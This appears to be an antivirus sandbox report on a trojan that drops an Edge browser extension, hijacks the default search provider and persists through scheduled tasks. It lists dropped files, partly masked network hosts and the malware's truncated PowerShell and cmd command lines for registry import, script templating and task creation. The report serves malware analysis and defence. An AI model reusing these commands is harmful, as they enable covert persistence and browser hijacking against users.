Trojan.Siggen32.26818

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\networkdiagnosticservice
<SYSTEM32>\tasks\systemcachemaintenance
<SYSTEM32>\tasks\gamesettingsdlc
<SYSTEM32>\tasks\gameupdaterdlc

Modifies file system

Creates the following files

%TEMP%\nsacb6f.tmp
%TEMP%\<File name>_patch-run.exe
%TEMP%\nsdd1d8.tmp
<Current directory>\sex desert mad lust.exe
%TEMP%\temp_cleanup.ico
%TEMP%\tidy.bat
%LOCALAPPDATA%\features\x\icon.png
%LOCALAPPDATA%\features\x\interface.html
%LOCALAPPDATA%\features\x\interface.js
%LOCALAPPDATA%\features\x\manifest.json
%LOCALAPPDATA%\features\x\pdf_handler.js
%LOCALAPPDATA%\features\x\script.js
%LOCALAPPDATA%\features\x\security.js
%LOCALAPPDATA%\features\x\style_01.css
%LOCALAPPDATA%\features\x\web_accessible_resource.js
%LOCALAPPDATA%\features\x\_locales\en\messages.json
%LOCALAPPDATA%\updateswin\update.tmp
%LOCALAPPDATA%\updateswin\updater.tmp
%LOCALAPPDATA%\diagnosticsnet\cache.tmp
%LOCALAPPDATA%\diagnosticsnet\configuration.tmp
%LOCALAPPDATA%\diagnosticsnet\update.tmp
%LOCALAPPDATA%\diagnosticsnet\updater.tmp
%TEMP%\nsme784.tmp\system.dll
nul
%LOCALAPPDATA%\features\wdaccytkmbzfsruewfbrjgzcossavpx\security.js
%LOCALAPPDATA%\diagnosticsnet\configuration.ps1
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-699f91ab-126c.pma
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-699f91ae-e88.pma
%LOCALAPPDATA%\microsoft\edge\user data\default\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\manifest-000002
%LOCALAPPDATA%\microsoft\edge\user data\default\000002.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\log
%LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\index
%LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_0
%LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_2
%LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_3
%LOCALAPPDATA%\microsoft\edge\user data\default\cookies-journal
%LOCALAPPDATA%\microsoft\edge\user data\default\cookies
%LOCALAPPDATA%\microsoft\edge\user data\default\session storage\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\session storage\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\session storage\log
%LOCALAPPDATA%\microsoft\edge\user data\default\session storage\000003.log
%LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\log
%LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\000003.log
%LOCALAPPDATA%\microsoft\edge\user data\default\cache\index
%LOCALAPPDATA%\microsoft\edge\user data\default\cache\data_0
%LOCALAPPDATA%\microsoft\edge\user data\default\cache\data_2
%LOCALAPPDATA%\microsoft\edge\user data\default\cache\data_3
%LOCALAPPDATA%\microsoft\edge\user data\default\reporting and nel-journal
%LOCALAPPDATA%\microsoft\edge\user data\default\code cache\js\af02dd0b579d2217_0
%LOCALAPPDATA%\microsoft\edge\user data\default\reporting and nel
%LOCALAPPDATA%\microsoft\edge\user data\default\extension state\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\extension state\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\extension state\log
%LOCALAPPDATA%\microsoft\edge\user data\default\heavy_ad_intervention_opt_out.db-journal
%LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\heavy_ad_intervention_opt_out.db
%LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\manifest-000002
%LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\000002.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\log
%LOCALAPPDATA%\microsoft\edge\user data\default\previews_opt_out.db-journal
%LOCALAPPDATA%\microsoft\edge\user data\default\previews_opt_out.db
%LOCALAPPDATA%\microsoft\edge\user data\default\shortcuts-journal
%LOCALAPPDATA%\microsoft\edge\user data\default\network action predictor-journal
%LOCALAPPDATA%\microsoft\edge\user data\default\shortcuts
%LOCALAPPDATA%\microsoft\edge\user data\default\network action predictor
%LOCALAPPDATA%\microsoft\edge\user data\last browser
%LOCALAPPDATA%\microsoft\edge\user data\default\preferredapps
%LOCALAPPDATA%\microsoft\edge\user data\default\budgetdatabase\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\budgetdatabase\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\budgetdatabase\log
%LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\eventdb\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\eventdb\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\autofillstrikedatabase\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\autofillstrikedatabase\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\eventdb\log
%LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\availabilitydb\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\availabilitydb\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\autofillstrikedatabase\log
%LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\availabilitydb\log
%LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\availabilitydb\000003.log
%TEMP%\02d47ce0-bf81-454e-a7c9-b5f1f642cd70.tmp

Deletes following files that it created itself

%TEMP%\nsme784.tmp\system.dll
%LOCALAPPDATA%\microsoft\edge\user data\default\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-699f91ab-126c.pma
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-699f91ae-e88.pma
%LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\manifest-000001

Moves the following files

from %LOCALAPPDATA%\updateswin\update.tmp to %LOCALAPPDATA%\updateswin\update.ps1
from %LOCALAPPDATA%\diagnosticsnet\updater.tmp to %LOCALAPPDATA%\diagnosticsnet\updater.vbs
from %LOCALAPPDATA%\updateswin\updater.tmp to %LOCALAPPDATA%\updateswin\updater.ps1
from %LOCALAPPDATA%\diagnosticsnet\configuration.tmp to %LOCALAPPDATA%\diagnosticsnet\configuration.ps1
from %LOCALAPPDATA%\diagnosticsnet\cache.tmp to %LOCALAPPDATA%\diagnosticsnet\cache.ps1
from %LOCALAPPDATA%\diagnosticsnet\update.tmp to %LOCALAPPDATA%\diagnosticsnet\update.vbs
from %LOCALAPPDATA%\microsoft\edge\user data\default\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\current
from %LOCALAPPDATA%\microsoft\edge\user data\default\session storage\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\session storage\current
from %LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\current
from %LOCALAPPDATA%\microsoft\edge\user data\default\extension state\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\extension state\current
from %LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\current
from %LOCALAPPDATA%\microsoft\edge\user data\default\budgetdatabase\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\budgetdatabase\current
from %LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\eventdb\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\eventdb\current
from %LOCALAPPDATA%\microsoft\edge\user data\default\autofillstrikedatabase\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\autofillstrikedatabase\current
from %LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\availabilitydb\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\feature engagement tracker\availabilitydb\current

Modifies the following files

%LOCALAPPDATA%\microsoft\edge\user data\last version
%LOCALAPPDATA%\microsoft\edge\user data\default\sync data\leveldb\log
%LOCALAPPDATA%\microsoft\edge\user data\default\site characteristics database\log
%LOCALAPPDATA%\microsoft\edge\user data\default\sync data\leveldb\000003.log
%LOCALAPPDATA%\microsoft\edge\user data\default\web data-journal
%LOCALAPPDATA%\microsoft\edge\user data\default\web data
%LOCALAPPDATA%\microsoft\edge\user data\default\visited links
%LOCALAPPDATA%\microsoft\edge\user data\default\history-journal
%LOCALAPPDATA%\microsoft\tokenbroker\cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
%LOCALAPPDATA%\microsoft\edge\user data\default\history

Substitutes the following files

%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Platform Notifications\LOG

Network activity

Connects to

'co####.edge.skype.com':443
'ge####locktag.com':443
'st####.##oudflareinsights.com':443
'a.###.#loudflare.com':443

TCP

Other

'co####.edge.skype.com':443
'ge####locktag.com':443
'st####.##oudflareinsights.com':443
'a.###.#loudflare.com':443

UDP

DNS ASK co####.edge.skype.com
DNS ASK ge####locktag.com
DNS ASK st####.##oudflareinsights.com
DNS ASK a.###.#loudflare.com

Miscellaneous

Searches for the following windows

ClassName: 'Chrome_MessageWindow' WindowName: '%LOCALAPPDATA%\Microsoft\Edge\User Data'

Creates and executes the following

'%TEMP%\<File name>_patch-run.exe' <Current directory>
'<Current directory>\sex desert mad lust.exe'

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\tidy.bat" "%TEMP%\<File name>_patch-run.exe" "DefaultSearchProvider" "HKEY_LOCAL_MACHINE\SOFTWARE\\" "ADHWWZ" "S13SPB2Z_2026-02" "<File name>_patch-run.exe" "Windows Registry Editor...
'%WINDIR%\syswow64\cmd.exe' /c powershell -NoProfile -Command "$set = 'abcdefghijklmnopqrstuvwxyz'; -join ((1..30 | ForEach-Object { $set[(Get-Random -Maximum $set.Length)] }))"
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "$set = 'abcdefghijklmnopqrstuvwxyz'; -join ((1..30 | ForEach-Object { $set[(Get-Random -Maximum $set.Length)] }))"
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(Get-Content -LiteralPath \"%TEMP%\temp_cleanup.ico\").Replace('{HKS}', '"HKEY_LOCAL_MACHINE\SOFTWARE\\"').Replace('{WRE}', '"Windows Registry Editor"') | Set-Content -LiteralPath \"%...
'%WINDIR%\syswow64\reg.exe' import %TEMP%\temp_cleanup.ico /reg:64
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "foreach ($item in @(\"$env:LOCALAPPDATA\DiagnosticsNET\configuration.ps1\", \"$env:LOCALAPPDATA\DiagnosticsNET\update.vbs\", \"$en...
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "$paths = @{ \"$env:LOCALAPPDATA\Features\x\" = 'wdaccytkmbzfsruewfbrjgzcossavpx'; \"$env:LOCALAPPDATA\DiagnosticsNET\configuration.tmp\" = 'configuration.ps1'; \"$env...
'%WINDIR%\syswow64\cmd.exe' /c powershell -command "gp 'HKCU:\Control Panel\International\Geo\' | select -exp Name"
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "gp 'HKCU:\Control Panel\International\Geo\' | select -exp Name"
'%WINDIR%\syswow64\cmd.exe' /S /D /c" echo AT BR CH DE DK ES FI FR HK IT MX NL NO SE SG TW GB UK US "
'%WINDIR%\syswow64\findstr.exe' /I /C:" "
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(Get-Content -LiteralPath \"$env:LOCALAPPDATA\Features\wdaccytkmbzfsruewfbrjgzcossavpx\security.js\") -replace '{BUCKET}', '"S13SPB2Z_2026-02"' -replace '{SUB}', '"ADHWWZ"' -replace '...
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $triggerAtStartup = New-ScheduledTaskTrigger -AtStartup; $triggerAtLogon = New-ScheduledTaskTrigger -AtLogon; $dt = (get-date).AddDays(30).AddMinutes(3); $stt = New-ScheduledTaskTrigger -Repeti...
'%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --single-argument https://getadblocktag.com/v1/s/t/info?a=ins&sub=ADHWWZX&n=<File name>&bucket=S13SPB2Z_2026-02X&u=9wdaccytkmbzfsruewfbrjgzcossavpx
'%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --flag-switches-begin --flag-switches-end --do-not-de-elevate https://getadblocktag.com/v1/s/t/info?a=ins&sub=ADHWWZX&n=<File name>&bucket=S13SPB2Z_2026-02X&u=9wdaccytkmbzfsruewfbrjgzcossavpx
'%ProgramFiles(x86)%\microsoft\edge\application\89.0.774.68\identity_helper.exe' --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,7463154910885726443,17944961859685311175,131072 --lang=en-US --service-sandbox-type=none --mojo-...
'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\tidy.bat" "%TEMP%\<File name>_patch-run.exe" "DefaultSearchProvider" "HKEY_LOCAL_MACHINE\SOFTWARE\\" "ADHWWZ" "S13SPB2Z_2026-02" "<File name>_patch-run.exe" "Windows Registry Editor...' (with hidden window)
'%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --flag-switches-begin --flag-switches-end --do-not-de-elevate https://getadblocktag.com/v1/s/t/info?a=ins&sub=ADHWWZX&n=<File name>&bucket=S13SPB2Z_2026-02X&u=9wdaccytkmbzfsruewfbrjgzcossavpx' (with hidden window)

技术

术语

教育培训

误区

Technical Information

Curing recommendations

Free trial